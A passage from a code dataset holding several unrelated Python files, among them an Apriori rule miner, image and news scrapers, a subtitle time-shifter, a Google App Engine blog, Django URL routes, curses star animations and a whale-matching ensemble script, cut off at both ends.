itemset2:\n\t\t\t\t\titemset2.append([item1,item2])\n\t\t\t\t\titemset2_count[item1,item2]=0\n\tfor items in itemset2:\n\t\tfor row in transactions:\n\t\t\tif set(items).issubset(row):\n\t\t\t\t\titemset2_count[items[0],items[1]]+=1\n\tfor items in itemset2:\n\t\titemset2_support[items[0],items[1]]=float(itemset2_count[items[0],items[1]]/no_of_transaction)\n\t\titemset2_confidence[items[0],items[1]]=float(itemset2_count[items[0],items[1]]/itemset_count[items[0]])\n\tfor items in itemset2:\n\t\tif itemset2_support[items[0],items[1]] >= min_support:\n\t\t\tfrequent_2itemset.append(items)\n\t\tif itemset2_confidence[items[0],items[1]] >= min_confidence:\n tmp=items[0]+\"->\"+items[1]\n rules.append(tmp)\n\ndef generate_3itemset():\n\t'''for item1 in frequent_1itemset:\n\t\tfor item2 in frequent_1itemset:\n\t\t\tfor item3 in frequent_1itemset:\n print(\"checking: \",item1,\" \",item2,\" \",item3,[item1, item2] in frequent_2itemset and [item2, item3] in frequent_2itemset and [item3, item1] in frequent_2itemset)\n if [item1, item2] in frequent_2itemset and [item2, item3] in frequent_2itemset and [item3, item1] in frequent_2itemset:\n itemset3.append([item1, item2, item3])\n itemset3_count[item1, item2, item3]=0'''\n\tfor item in frequent_1itemset:\n\t\tfor items in frequent_2itemset:\n\t\t\titems3=[]\n\t\t\tif item not in items:\n\t\t\t\titems3=[item, items[0],items[1]]\n\t\t\t\titems3.sort()\n\t\t\t\titemset3.append(items3)\n\t\t\t\titemset3_count[items3[0],items3[1],items3[2]]=0\n\tfor items in itemset3:\n\t\tfor row in transactions:\n\t\t\tif set(items).issubset(row):\n\t\t\t\titemset3_count[items[0],items[1],items[2]]+=1\n\tfor items in itemset3:\n\t\titemset3_support[items[0],items[1],items[2]]=float(itemset3_count[items[0],items[1],items[2]]/no_of_transaction)\n\t\ttry:\n\t\t\tif not itemset2_count[items[0],items[1]]==0:\n\t\t\t\titemset3_confidence[items[0],items[1],items[2]]=float(itemset3_count[items[0],items[1],items[2]]/itemset2_count[items[0],items[1]])\n\t\texcept:\n\t\t\tif not itemset2_count[items[1],items[0]]==0:\n\t\t\t\titemset3_confidence[items[0],items[1],items[2]]=float(itemset3_count[items[0],items[1],items[2]]/itemset2_count[items[1],items[0]])\n\tfor items in itemset3:\n\t\tif itemset3_support[items[0],items[1],items[2]] >= min_support:\n\t\t\t#print([items[0],items[1],items[2]],itemset3_support[items[0],items[1],items[2]])\n\t\t\tfrequent_3itemset.append(items)\n\n\tfor items in itemset3_confidence:\n #if itemset3_confidence[items[0],items[1],items[2]] >= min_confidence:\n\t\tif itemset3_confidence[items] >= min_confidence:\n tmp=items[0]+\",\"+items[1]+\"->\"+items[2]\n rules.append(tmp)\n\n\nstart_time=time.time()\nread_transactions()\nno_of_transaction=len(transactions)\nprint(no_of_transaction)\n#print(transactions)\n\ngenerate_1itemset()\nprint(\"Frequent 1-itemset\")\nprint(frequent_1itemset)\n\ngenerate_2itemset()\nprint(\"Frequent 2-itemset\")\nprint(frequent_2itemset)\n\ngenerate_3itemset()\nprint(\"Frequent 3-itemset\")\n#print(frequent_3itemset)\n\nprint(\"rules generated: \", len(rules))\nprint(\"execution time: \", time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time)))\n","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"139163357","text":"def read_adapters(file_location):\n \"\"\"Read file the code\n \"\"\"\n adapters = open(file_location, 'r').read().split('\\n')\n adapters = [int(entry) for entry in adapters if entry != '']\n adapters.sort()\n return adapters\n\n\nif __name__ == '__main__':\n\n difference_1 = 0\n difference_3 = 0\n current_joltage = 0\n adapters = read_adapters('data\\\\day_10.txt')\n for adapter in adapters:\n\n if current_joltage + 1 == adapter:\n difference_1 += 1\n current_joltage = adapter\n elif current_joltage + 3 == adapter:\n difference_3 += 1\n current_joltage = adapter\n else:\n continue\n\n print(difference_1 * (difference_3+1))\n","sub_path":"2020/days/day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"555465418","text":"# import time\n#\n# import aiohttp\n# import asyncio\n# from src.utils import read_links_txt\n#\n# links = read_links_txt('../input/images_links.txt')\n#\n# start = time.perf_counter()\n#\n# async def get(url):\n# async with aiohttp.ClientSession() as session:\n# async with session.get(url,\n# ssl=False\n# ) as response:\n# return response.status\n#\n# loop = asyncio.get_event_loop()\n#\n# tasks = [get(link) for link in links]\n# results = loop.run_until_complete(asyncio.gather(*tasks))\n# print(f'Elapsed:{time.perf_counter()-start}')\n# print(\"Results: %s\" % results)\n\nimport os\nimport pathlib\nimport time\nimport aiohttp\nimport aiofiles\nimport asyncio\n\nfrom bs4 import BeautifulSoup\n\nfrom src.utils import read_links_txt, get_file_name_from_url\n\n# links = read_links_txt('../input/images_links.txt')\\\n\nimg_dir = '../img/async'\n\npathlib.Path(img_dir).mkdir(parents=True, exist_ok=True)\n\n\nasync def links_scraper(url):\n async with aiohttp.ClientSession() as session:\n async with session.get(url, ssl=False) as resp:\n soup = BeautifulSoup(await resp.text(), \"html.parser\")\n image = soup.findAll(\"img\")\n d = [i['src'] for i in image]\n link = []\n for i in d:\n if (i[-4:]) == '.jpg':\n link.append(i)\n yield link\n\n\nstart = time.perf_counter()\n\n\nasync def download(url):\n async with aiohttp.ClientSession() as session:\n async with session.get(url, ssl=False) as response:\n f = await aiofiles.open(os.path.join(img_dir, get_file_name_from_url(url)), mode='wb')\n await f.write(await response.read())\n await f.close()\n\n\nasync def app_main():\n async for i in links_scraper('https://wallpaperscraft.ru/'):\n for g in i:\n await download(g)\n\n\nloop = asyncio.get_event_loop()\n# tasks = [download(link) async for link in links_scraper(\"https://www.pinterest.com\")]\n# loop.run_until_complete(asyncio.gather(*tasks))\nloop.run_until_complete(app_main())\nprint(f'Elapsed:{time.perf_counter() - start}')\n","sub_path":"src/async_parser.py","file_name":"async_parser.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"638520833","text":"from collections import Counter \nimport time\n\nstart = time.time()\ns = \"\"\nres = []\ntemp = []\nindex = 0\nwith open('sample1.txt') as f:\n for i in f:\n s = s + i\ns = s.replace(',','').strip()\ns = s.replace('.','').strip()\nwords = s.split(' ')\nfor i in range(len(words)):\n r = set()\n for j in range(i+1,len(words)):\n if(words[j] not in temp and words[i] != words[j]):\n if(Counter(words[i].lower()) == Counter(words[j].lower())): # check if it is anagram\n temp.append(words[j]) # if yes add it to an temporary list\n r.add(words[i])\n r.add(words[j]) # add anagrams to a set \n if(len(r)!=0):\n res.append(r)\nres = res[::-1]\nf = \"\"\n\nfor i in res:\n for j in i:\n f = f + \",\" + j\n f = f[1:len(f)]\n print(f)\n f = \"\"\n\nprint(\"program took \" + str(time.time()-start) + \"secs\")","sub_path":"anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"88124816","text":"from datetime import datetime, timedelta\n\n\ndef tiempo(hora):\n hora = hora.replace(' ', '')\n datetime_object = datetime.strptime(hora, '%H:%M:%S,%f')\n X = 13\n result = datetime_object - timedelta(seconds=X)\n result = ','.join(str(result.time()).split('.'))\n return result[:-3]\n\n\nentrada = open('/Users/gerardorodriguez/Downloads/MyFlow/subtitulos.srt')\nsalida = open('/Users/gerardorodriguez/Downloads/MyFlow/subtitulos_salida.srt', 'w+')\nfor row in entrada.readlines():\n row = row.strip().split('-->')\n try:\n final = row[1]\n final = tiempo(final)\n comienzo = row[0]\n comienzo = tiempo(comienzo)\n salida.write(str(comienzo) + ' --> ' + str(final) + '\\n')\n except Exception as ex:\n salida.write(row[0] + '\\n')\nsalida.close()","sub_path":"subtitulos.py","file_name":"subtitulos.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"265541461","text":"\"\"\" \nExamples of documentation used in FIT1008/FIT1054/FIT2085.\n\nThis module demonstrates the level of documentation for modules and\nfunctions that we will require in the unit. Examples for classes,\nexceptions and testing will appear later in the unit.\n\nFurther to Further example of good documentation under Important \nDocuments on Moodle for more details.\n\"\"\"\n\n__author__ = \"Maria Garcia de la Banda\"\n\nfrom typing import List, Union, TypeVar # this is how we import things\nT = TypeVar('T')\n\n\ndef max_age(age1: int, age2: int) -> int:\n return age1 if age1 > age2 else age2\n\n\ndef has_a_negative(list: List[int]) -> bool:\n \"\"\" Checks if the list has a negative number.\n\n :pre: The list must contain elements\n :post: The list should not be modified\n :complexity: Best O(1) if negative number appears first, worst O(N),\n where N is the length of list, when all are >= 0\n \"\"\"\n assert len(list) > 0, \"List must contain elements\"\n \n for item in list:\n if item < 0:\n return True\n return False\n\n\ndef string_to_number(string: str) -> Union[int, float]:\n \"\"\" Converts a string into an int or a float.\n :raises ValueError: if the string is neither an int nor a float\n \"\"\"\n try:\n return int(string)\n except ValueError:\n return float(string)\n\n\n\ndef disjoint(list1: List[T], list2: List[T]) -> bool:\n \"\"\" Checks if two lists have no elements in common.\n\n :param arg1: often student in a Monash Activity (lecture, lab, etc)\n :param arg2: often students in a different Monash Activity \n :complexity: Best O(1) if their first element is the same, worst \n O(N1*N2)*O(==), where NX is the length of listX, and \n O(==) is the complexity of ==, when they are disjoint\n \"\"\"\n for item1 in list1:\n for item2 in list2:\n if item1 == item2:\n return False\n return True \n\n\ndef main():\n \"\"\" Calls all functions with some inputs and prints the result.\"\"\"\n print(max_age(-1, 3)) \n print(max_age(-1, -1))\n print(has_a_negative([1, 2, 3, -4]))\n print(has_a_negative([]))\n print(string_to_number(\" 14 \"))\n print(string_to_number(\" -14.6 \"))\n print(disjoint([1, 2, 3],[1]))\n print(disjoint([1, 2, 3],[4, 5, 6, 7]))\n print(string_to_number(\" 1 2 \")) # should throw ValueError\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"example_documentation.py","file_name":"example_documentation.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"461698895","text":"#!/usr/bin/env python\nimport wsgiref.handlers\nimport os\nimport re\nimport logging\nimport functools\nimport yaml\nimport ConfigParser\n\nfrom google.appengine.api import memcache\n\nfrom models import Post, PostQueries, PostUpdates\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import users\nfrom google.appengine.ext.webapp import template\n\nconfig = ConfigParser.ConfigParser()\nconfig.read('config.cfg')\n\ndef admin(method):\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n user = users.get_current_user()\n if not user:\n if self.request.method == \"GET\":\n return self.redirect(users.create_login_url(self.request.uri))\n return self.error(403)\n elif not users.is_current_user_admin():\n return self.error(403)\n else:\n return method(self, *args, **kwargs)\n return wrapper\n\nclass BaseRequestHandler(webapp.RequestHandler):\n \n def error_page(self,code=404):\n self.error(code)\n self.render(\"error/%i.html\" % code)\n \n def render(self,template_file, context={}):\n global config\n path = os.path.join(os.path.dirname(__file__), template_file)\n context['google_analytics_key'] = config.get('blog', 'google_analytics_key')\n self.response.out.write(template.render(path, context))\n \n\nclass MainHandler(BaseRequestHandler):\n \n def get(self):\n context = {\n \"posts\": PostQueries().get_all_posts(),\n }\n self.render('base.html', context)\n\nclass BlogRSSHandler(BaseRequestHandler):\n \n def get(self):\n posts = PostQueries().get_all_posts()\n last_modified_utc = PostQueries().get_last_modified_utc_time()\n context = {\n \"posts\": posts,\n \"last_modified\": last_modified_utc\n }\n self.response.headers.__delitem__(\"Content-Type\")\n self.response.headers.add_header(\"Content-Type\", \"text/xml\")\n self.render('blog/rss.html', context)\n \n \n\nclass BlogHandler(BaseRequestHandler):\n \n def get(self):\n post = PostQueries().get_post_from_path(self.request.path)\n context = {\n \"post\": post,\n }\n self.render('base_post.html', context)\n\nclass EditBlogHandler(BaseRequestHandler):\n \n @admin\n def get(self):\n post = PostQueries().get_post_from_title(self.request.get('title'))\n context = {\n \"post\": post,\n }\n self.render('blog/edit_post_form.html', context)\n \n @admin\n def post(self):\n post = PostQueries().get_post_from_title(self.request.get('title'))\n post.title = self.request.get('title')\n post.content = self.request.get('content')\n \n post = PostUpdates().update(post)\n context = {\n \"post\" : post,\n }\n self.render('blog/post_edited.html', context)\n \n \n\nclass NewBlogHandler(BaseRequestHandler):\n \n @admin\n def get(self):\n self.render('blog/new_post_form.html')\n \n @admin\n def post(self):\n \n post = Post(title = self.request.get('title'),\n content = self.request.get('content'),\n tags = 1 and [str.strip() for str in self.request.get('tags').split(',')] or [])\n \n post = PostUpdates().add(post)\n context = {\n \"post\" : post,\n }\n self.render('blog/new_post_created.html', context)\n \n\nclass ProjectsHandler(BaseRequestHandler):\n \n def get(self):\n m = re.search('projects/instagreader/instagreader_(\\d+)_(.*?).user.js', self.request.path)\n if (m != None):\n context = { \"v\": m.group(1), \"k\": m.group(2) }\n self.render('projects/instagreader/instagreader.user.js', context)\n else:\n template = self.request.path[1:]\n template = re.sub(r'^(.*)/$', r'\\1/index.html', template)\n if (re.match(r'.*\\w$', template) and not(re.match(r'.*\\.html$', template))):\n template = template + \"/index.html\"\n self.render(template)\n \nclass AdminHandler(BaseRequestHandler):\n\t@admin\n\tdef get(self):\n\t\tmemcache.flush_all()\n\t\tself.response.out.write('

memcache flushed

')\n\nclass NotFoundHandler(BaseRequestHandler):\n \n def get(self):\n self.error_page(404)\n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n \n application = webapp.WSGIApplication(\n [\n ('/', MainHandler),\n ('/blog/', MainHandler),\n ('/blog/new', NewBlogHandler),\n ('/blog/edit/*', EditBlogHandler),\n (r'/blog/rss/?', BlogRSSHandler),\n (r'/blog/\\d\\d\\d\\d/\\d\\d/\\d\\d/.+', BlogHandler),\n (r'/projects/?.*', ProjectsHandler),\n (r'/admin/?.*', AdminHandler),\n (r'.*', NotFoundHandler)\n ],\n debug=True)\n wsgiref.handlers.CGIHandler().run(application)\n\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496758693","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom feedbacks import views\n\nfrom sdacademy.views import index, contact, student_list, student_detail\nfrom courses.views import course_list_index\n\n\nurlpatterns = patterns('',\n url(r'^polls/', include('polls.urls', namespace=\"polls\")),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^quadratic/', include('quadratic.urls')),\n url(r'^$', course_list_index, name=\"index\"),\n url(r'^index/', course_list_index, name=\"index\"),\n url(r'^feedback/', views.FeedbackView.as_view(), name=\"feedback\"),\n #url(r'^$', include('courses.urls', namespace='courses')),\n #url(r'^index/', include('courses.urls', namespace='courses')),\n url(r'^courses/', include('courses.urls', namespace='courses')),\n url(r'^students/', include('students.urls', namespace='students')),\n url(r'^coaches/', include('coaches.urls', namespace='coaches')),\n url(r'^contact/', contact, name=\"contact\"),\n url(r'^student_list/', student_list, name=\"student_list\"),\n url(r'^student_detail/', student_detail, name=\"student_detail\"),\n)\n","sub_path":"sdacademy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164316408","text":"import asyncio\nimport curses\nfrom random import choice, randint\n\nfrom curses_tools import discover_active_area\n\n\nasync def blink(canvas, row, column, symbol='*'):\n while True:\n canvas.addstr(row, column, symbol, curses.A_DIM)\n for i in range(randint(1, 18)):\n await asyncio.sleep(0)\n\n canvas.addstr(row, column, symbol)\n for i in range(randint(1, 8)):\n await asyncio.sleep(0)\n\n canvas.addstr(row, column, symbol, curses.A_BOLD)\n for i in range(randint(1, 3)):\n await asyncio.sleep(0)\n\n canvas.addstr(row, column, symbol)\n for i in range(randint(1, 3)):\n await asyncio.sleep(0)\n\n\ndef prepare_blink_coroutines(\n canvas, amount_of_stars: int = 100, stars_symbols='+*.:'\n) -> list:\n active_area = discover_active_area(canvas)\n\n return [\n blink(\n canvas=canvas,\n # We don't want to place stars at borderline, so 1 row/column cap\n row=randint(\n active_area['border_limit_top'], active_area['border_limit_bottom'] - 1\n ),\n column=randint(\n active_area['border_limit_left'], active_area['border_limit_right'] - 1\n ),\n symbol=choice(stars_symbols),\n )\n for _ in range(amount_of_stars)\n ]\n","sub_path":"animations_code/background_animation.py","file_name":"background_animation.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"158320495","text":"# coding: utf-8\r\n__author__ = 'ZFTurbo: https://kaggle.com/zfturbo'\r\n\r\n\r\nfrom a00_common_functions import *\r\nfrom scipy.sparse import csr_matrix\r\n\r\n\r\ndef get_tagged_data():\r\n # load tagged data\r\n tagged = dict([(p[:-4] + '.jpg', w) for _, p, w in pd.read_csv(INPUT_PATH + 'train.csv').to_records()])\r\n # print(\"Total tagged images: \", len(tagged))\r\n return tagged\r\n\r\n\r\ndef get_real_answers(ids):\r\n tagged = get_tagged_data()\r\n answ = []\r\n for id in ids:\r\n try:\r\n answ.append(tagged[id + '.jpg'])\r\n except:\r\n answ.append(tagged[list(tagged.keys())[0]])\r\n return np.array(answ)\r\n\r\n\r\ndef get_single_score(preds, id, compare_ids, real_answ, real_labels, thr):\r\n print_num = 5\r\n verbose = False\r\n\r\n # Remove same id\r\n cond = np.where(np.isin(compare_ids, [id]))\r\n preds[cond] = -1\r\n\r\n sorted_args = np.argsort(preds)[::-1]\r\n probs = preds[sorted_args]\r\n ids = compare_ids[sorted_args]\r\n train_labels = real_labels[sorted_args]\r\n\r\n if verbose:\r\n print(real_answ)\r\n print(probs[:print_num])\r\n print(ids[:print_num])\r\n print(train_labels[:print_num])\r\n train_names = []\r\n for t in train_labels[:10]:\r\n train_names.append(t)\r\n print(train_names)\r\n\r\n answ = []\r\n cond = probs > thr\r\n res = dict()\r\n prob1 = probs[cond]\r\n train_labels1 = train_labels[cond]\r\n for j, p in enumerate(prob1):\r\n lbl = train_labels1[j]\r\n if lbl not in res:\r\n res[lbl] = 0\r\n res[lbl] += p\r\n res = sort_dict_by_values(res)\r\n if verbose:\r\n print(res)\r\n\r\n for j in range(min(len(res), 5)):\r\n answ.append(res[j][0])\r\n if len(answ) < 5:\r\n answ.append('new_whale')\r\n for j, p in enumerate(probs):\r\n lbl = train_labels[j]\r\n if lbl not in answ:\r\n answ.append(lbl)\r\n if len(answ) >= 5:\r\n break\r\n if verbose:\r\n print(str(answ))\r\n\r\n score = apk([real_answ], answ, k=5)\r\n return score, answ\r\n\r\n\r\ndef get_score_from_matrix(m, base_order_valid, base_order_train, answ_valid, answ_train, thr):\r\n new_whales_count = 0\r\n scores = []\r\n for i in range(m.shape[0]):\r\n preds = m[i].copy()\r\n score, answ1 = get_single_score(preds, base_order_valid[i], base_order_train, answ_valid[i], answ_train, thr)\r\n # print('ID: {} Score: {} Avg score: {} Real answ: {} Answ: {}'.format(ids_valid[i], score, score_sum / (i + 1), answ_valid[i], answ1))\r\n if answ1[0] == 'new_whale':\r\n new_whales_count += 1\r\n scores.append(score)\r\n return scores, new_whales_count\r\n\r\n\r\ndef concat_fold_matrix(matrix_arr, base_order_valid, base_order_train, answ_valid, answ_train):\r\n matrix_arr_full = []\r\n base_order_valid = np.concatenate(base_order_valid)\r\n # check if base_order train is the same\r\n for i in range(4):\r\n for j in range(i+1, 4):\r\n if tuple(base_order_train[i]) != tuple(base_order_train[j]):\r\n print('Error base_order_train!')\r\n exit()\r\n if tuple(answ_train[i]) != tuple(answ_train[j]):\r\n print('Error answ_train!')\r\n exit()\r\n base_order_train = base_order_train[0]\r\n answ_valid = np.concatenate(answ_valid)\r\n answ_train = answ_train[0]\r\n m = []\r\n for fold in range(4):\r\n part = np.array(matrix_arr[fold])\r\n m.append(part)\r\n m = np.concatenate(m)\r\n matrix_arr_full.append(m)\r\n matrix_arr = np.array(matrix_arr_full)\r\n print(matrix_arr.shape)\r\n print(base_order_valid.shape)\r\n print(base_order_train.shape)\r\n print(answ_valid.shape)\r\n print(answ_train.shape)\r\n return matrix_arr, base_order_valid, base_order_train, answ_valid, answ_train\r\n\r\n\r\ndef zerofy_same_ids(matrix_arr, base_order_valid, base_order_train):\r\n for i in range(matrix_arr.shape[1]):\r\n # Remove same id\r\n cond = np.where(np.isin(base_order_train, [base_order_valid[i]]))\r\n matrix_arr[:, i, cond] = 0\r\n return matrix_arr\r\n\r\n\r\ndef remove_tst_data(matrix_arr, base_order_train, answ_train):\r\n s = list(pd.read_csv(INPUT_PATH + 'sample_submission.csv')['Image'].values)\r\n\r\n print('Initial matrix shape: {}'.format(matrix_arr.shape))\r\n use_ids = []\r\n total = 0\r\n for i in range(len(base_order_train)):\r\n if base_order_train[i] + '.jpg' not in s:\r\n use_ids.append(i)\r\n else:\r\n total += 1\r\n use_ids = np.array(use_ids)\r\n print('Removed IDs: {}'.format(total))\r\n\r\n matrix_arr = matrix_arr[:, :, use_ids]\r\n base_order_train = base_order_train[use_ids]\r\n answ_train = answ_train[use_ids]\r\n print('Updated matrix shape: {}'.format(matrix_arr.shape))\r\n return matrix_arr, base_order_train, answ_train\r\n\r\n\r\ndef create_matrix_train(tables_path, out_path):\r\n EPS = 0.00001\r\n print('Go for: {}'.format(tables_path))\r\n matrix_arr = []\r\n base_order_valid = []\r\n base_order_train = []\r\n answ_valid = []\r\n answ_train = []\r\n scores_full = []\r\n for fold in range(4):\r\n matrix_arr.append([])\r\n base_order_valid.append(None)\r\n base_order_train.append(None)\r\n answ_valid.append([])\r\n answ_train.append([])\r\n\r\n for fold in range(4):\r\n file = tables_path\r\n file = file.replace('*', str(fold))\r\n print('Read {}'.format(file))\r\n data = load_from_file_fast(file)\r\n order_valid = np.array(data[0])\r\n order_train = np.array(data[1])\r\n m = data[2]\r\n\r\n order_valid = np.array([x[:-4] for x in order_valid])\r\n order_train = np.array([x[:-4] for x in order_train])\r\n\r\n asort_valid = np.argsort(order_valid)\r\n asort_train = np.argsort(order_train)\r\n print(m.shape)\r\n m = m[asort_valid, :]\r\n m = m[:, asort_train]\r\n\r\n base_order_valid[fold] = order_valid[asort_valid]\r\n base_order_train[fold] = order_train[asort_train]\r\n answ_valid[fold] = get_real_answers(base_order_valid[fold])\r\n answ_train[fold] = get_real_answers(base_order_train[fold])\r\n\r\n scores, nw = get_score_from_matrix(m, base_order_valid[fold], base_order_train[fold], answ_valid[fold], answ_train[fold], thr=0.99)\r\n scores_full += scores\r\n matrix_arr[fold] = m\r\n print('Fold score: {:.6f}'.format(np.array(scores).mean()))\r\n\r\n print('Overall score: {:.6f}'.format(np.array(scores_full).mean()))\r\n # Concatenate all folds\r\n matrix_arr, base_order_valid, base_order_train, answ_valid, answ_train = \\\r\n concat_fold_matrix(matrix_arr, base_order_valid, base_order_train, answ_valid, answ_train)\r\n\r\n # Remove pseudolabel test data\r\n matrix_arr, base_order_train, answ_train = remove_tst_data(matrix_arr, base_order_train, answ_train)\r\n\r\n # Set 0 to same IDs\r\n matrix_arr = zerofy_same_ids(matrix_arr, base_order_valid, base_order_train)\r\n\r\n # Prepare final dict\r\n base_order_valid = np.array([x + '.jpg' for x in base_order_valid])\r\n base_order_train = np.array([x + '.jpg' for x in base_order_train])\r\n\r\n print(base_order_valid)\r\n print(base_order_train)\r\n\r\n # Prepare sparse matrix\r\n matrix_arr = matrix_arr[0]\r\n matrix_arr[matrix_arr < EPS] = 0.0\r\n matrix_arr = csr_matrix(matrix_arr)\r\n print(matrix_arr.shape)\r\n\r\n out = dict()\r\n out['row_names'] = base_order_valid\r\n out['col_names'] = base_order_train\r\n out['overall_score'] = np.array(scores_full).mean()\r\n out['val_vs_train_mat_sparse'] = matrix_arr\r\n\r\n # Save to file\r\n save_in_file_fast(out, out_path)\r\n\r\n\r\ndef create_matrix_tst(tables_path, out_path):\r\n EPS = 0.00001\r\n\r\n out_path = out_path[:-4] + '-test.pkl'\r\n\r\n matrix_arr = []\r\n file = tables_path\r\n print('Read {}'.format(file))\r\n data = load_from_file_fast(file)\r\n\r\n order_valid = np.array(data[0])\r\n order_train = np.array(data[1])\r\n m = data[2]\r\n\r\n # order_valid = np.array([x[:-4] for x in order_valid])\r\n # order_train = np.array([x[:-4] for x in order_train])\r\n\r\n asort_valid = np.argsort(order_valid)\r\n asort_train = np.argsort(order_train)\r\n print(m.shape)\r\n m = m[asort_valid, :]\r\n m = m[:, asort_train]\r\n\r\n base_order_valid = order_valid[asort_valid]\r\n base_order_train = order_train[asort_train]\r\n\r\n matrix_arr.append(m.copy())\r\n\r\n matrix_arr = np.array(matrix_arr)\r\n print(matrix_arr.shape)\r\n\r\n intersection = (set(base_order_valid) & set(base_order_train))\r\n print('Intersection of IDs:', len(intersection))\r\n\r\n # Set 0 to same IDs\r\n matrix_arr = zerofy_same_ids(matrix_arr, base_order_valid, base_order_train)\r\n\r\n # Prepare sparse matrix\r\n matrix_arr = matrix_arr[0]\r\n matrix_arr[matrix_arr < EPS] = 0.0\r\n matrix_arr = csr_matrix(matrix_arr)\r\n print(matrix_arr.shape)\r\n\r\n out = dict()\r\n out['row_names'] = base_order_valid\r\n out['col_names'] = base_order_train\r\n # name = os.path.basename(out_path).split('-')[2]\r\n out['test_vs_train_mat_sparse'] = matrix_arr\r\n\r\n # Save to file\r\n save_in_file_fast(out, out_path)\r\n\r\n\r\ndef get_matrix_list():\r\n matrix_list = [\r\n [\r\n # Overall score: 0.964212\r\n OUTPUT_PATH + 'seamese_net_v5_rgb_densenet121_512px/full_valid_vs_full_train_matrix_fold_*.pkl',\r\n OUTPUT_PATH + 'seamese_net_v5_rgb_densenet121_512px/full_test_vs_train_matrix_avg.pkl',\r\n FEATURES_PATH + 'cv-analysis-fs14-LB959-densenet121-512px-sparse.pkl',\r\n ],\r\n [\r\n # Overall score: 0.963513\r\n OUTPUT_PATH + 'seamese_net_v6_rgb_seresnext50_384px/full_valid_vs_full_train_matrix_fold_*.pkl',\r\n OUTPUT_PATH + 'seamese_net_v6_rgb_seresnext50_384px/full_test_vs_train_matrix_avg.pkl',\r\n FEATURES_PATH + 'cv-analysis-fs16-LB959-seresnext50-384px-sparse.pkl',\r\n ],\r\n ]\r\n return matrix_list\r\n\r\n\r\nif __name__ == '__main__':\r\n matrix_list = get_matrix_list()\r\n start_time = time.time()\r\n for m in matrix_list:\r\n create_matrix_train(m[0], m[2])\r\n for m in matrix_list:\r\n create_matrix_tst(m[1], m[2])\r\n print('Time: {:.0f} sec'.format(time.time() - start_time))\r\n","sub_path":"code/r20_prepare_matrices_for_ensemble.py","file_name":"r20_prepare_matrices_for_ensemble.py","file_ext":"py","file_size_in_byte":10176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"494678322","text":"n = int(input())\nx, y = 1,1\nplans = input().split()\n\n#방향에 따른 이동 방향 설정\n\ndx = [0,0,-1,1]\ndy = [-1,1,0,0] \nmove_type = ['L','R','U','D']\n\nfor plan in plans:\n #이동 후 좌표 구하기\n for i in range(len(move_type)):\n if plan == move_type[i]:\n nx = x + dx[i]\n ny = y + dy[i]\n #공간을 벗어나는 경우 무시 \n if nx < 1 or ny <1 or nx> n or ny >n:\n continue\n x,y = nx,ny\nprint(x,y)\n","sub_path":"이코테/구현/상하좌우.py","file_name":"상하좌우.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"313491938","text":"import requests\nfrom bs4 import BeautifulSoup, NavigableString, Tag\nimport csv\n\nsoup_objects =[]\n\n\nbase_url = 'https://search.naver.com/search.naver?&where=news&query=%EA%B4%91%EC%A3%BC%EC%9D%B8%EA%B3%B5%EC%A7%80%EB%8A%A5%EC%82%AC%EA%B4%80%ED%95%99%EA%B5%90&sm=tab_pge&sort=0&photo=0&field=0&reporter_article=&pd=0&ds=&de=&docid=&nso=so:r,p:all,a:all&mynews=0&cluster_rank=69&start='\n\nend_url = '&refresh_start=0'\n# final_page = input('몇 페이지?? : ')\n# final_page = int(final_page)\n\n\nfor i in range(1, 102, 10):\n start_num = i\n\n URL = base_url + str(start_num) + end_url\n\n response = requests.get(URL)\n\n soup = BeautifulSoup(response.text, 'html.parser')\n soup_objects.append(soup)\n\nfor soup in soup_objects:\n\n news_selection = soup.select(\n 'div[id=wrap] > div[id=container] > div[id=content] > div[id=main_pack] > div.news.mynews.section._prs_nws > ul[class=type01] > li')\n\n for news in news_selection:\n a_tag = news.select_one('dl>dt>a')\n news_title = a_tag['title']\n news_link = a_tag['href']\n\n news_data = {\n \"title\" : news_title,\n \"hyperlink\" : news_link\n }\n\n with open('./naver_news.csv', 'a', encoding='utf-8-sig', newline='') as csvfile:\n fieldnames = ['title', 'hyperlink']\n csvwriter = csv.DictWriter(csvfile, fieldnames = fieldnames)\n csvwriter.writerow(news_data)\n\n","sub_path":"news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"630851494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 00:56:23 2018\n\n@author: paris\n\"\"\"\n\nsmaller=1\nbigger=2\nlist_fibo=[]\n\nwhile bigger<4000000:\n if bigger%2==0:\n 